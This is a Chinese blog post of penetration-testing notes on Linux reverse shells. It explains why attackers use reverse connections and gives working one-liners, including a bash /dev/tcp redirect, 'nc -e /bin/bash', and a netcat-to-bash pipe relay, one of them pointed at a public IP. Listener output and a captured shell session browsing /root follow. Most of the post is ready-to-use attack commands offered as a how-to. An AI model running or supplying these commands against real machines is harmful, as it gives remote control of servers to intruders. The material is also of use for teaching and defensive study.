Linux渗透之反弹Shell

jackxiang 2017-6-24 12:41 | |
ls /proc/8145/fd      #0,1给定和到socket里面了
https://help.aliyun.com/document_detail/206139.htm

xiangdong@kali-linux-bj-yz-10-10-0-136:~$
nc -lvvp 6767

[root@levoo-gateway_virtualrouter-ipforward_bj_rfls_10_10_0_3:/tmp]
bash -i >& /dev/tcp/10.10.0.136/6767 0>&1

来自:https://blog.csdn.net/weixin_50464560/article/details/123886779


反弹shell通常适用于如下几种情况:

目标机因防火墙受限,目标机器只能发送请求,不能接收请求。
目标机端口被占用。
目标机位于局域网,或IP会动态变化,攻击机无法直接连接。
对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机,都是未知的。
......
对于以上几种情况,我们是无法利用正向连接的,要用反向连接。
背景:反弹是目标机主动连接攻击机,是指在控制的机器上开一个端口,在另一端被入侵的服务器上面开一个连接到公网服务器的IP和端口。
如,被控机上运行(相当于在一台生产服务器上面访问一个websocket不断开):
nc -e /bin/bash 10.10.0.136 4444

在控制机上面开端口,并能反过来控制那台发起连接的服务器,靠的是它上面的bash解析器:
nc -lp 4444
ls
anaconda-ks.cfg
pwd
/root
ls
anaconda-ks.cfg
cd /home/      
ls
10.10.0.1** #/home目录


按顺序开三个SecureCRT终端,在一里面输入echo "hello jackX",会在二里面显示hello jackX:
一、
nc -l -p 1234 -vv
echo "hello jackX"

二、
nc -l -p 4321 -vv
hello jackX

三、
nc 10.44.202.177 1234|/bin/bash|nc 10.44.202.177 4321
nc 123.57.252.183 1234|/bin/bash|nc 123.57.252.183 4321



这时我们就可以在1234端口输入命令,在4321端口查看命令的输出了。

管道“|”可以将上一个命令的输出作为下一个命令的输入。所以上面命令的意思就是将10.42.0.1:1234传过来的命令交给/bin/bash执行,再将执行结果传给10.44.202.177:4321显示。



nc -l -p 4321 -vv
nc -l -p 4321 -vv
Ncat: Version 6.40 ( http://nmap.org/ncat )
Ncat: Listening on :::4321
Ncat: Listening on 0.0.0.0:4321
Ncat: Connection from 10.44.202.177.
Ncat: Connection from 10.44.202.177:59294.


nc -l -p 1234 -vv
Ncat: Version 6.40 ( http://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.44.202.177.
Ncat: Connection from 10.44.202.177:51650.


nc 10.44.202.177 1234|/bin/bash|nc 10.44.202.177 4321
触发上面两个。

摘自实践自:【【安全客】Linux渗透之反弹Shell】http://m.toutiao.com/group/6398009141268365570/?iid=7737129548&app=news_article&tt_from=copy_link&utm_source=copy_link&utm_medium=toutiao_ios&utm_campaign=client_share

作者:jackxiang@向东博客 专注WEB应用 构架之美 --- 构架之美,在于尽态极妍 | 应用之美,在于药到病除
地址:https://jackxiang.com/post/9254/
版权所有。转载时必须以链接形式注明作者和原始出处及本声明!


最后编辑: jackxiang 编辑于2022-8-12 09:40
评论列表
发表评论

昵称

网址

电邮

打开HTML 打开UBB 打开表情 隐藏 记住我 [登入] [注册]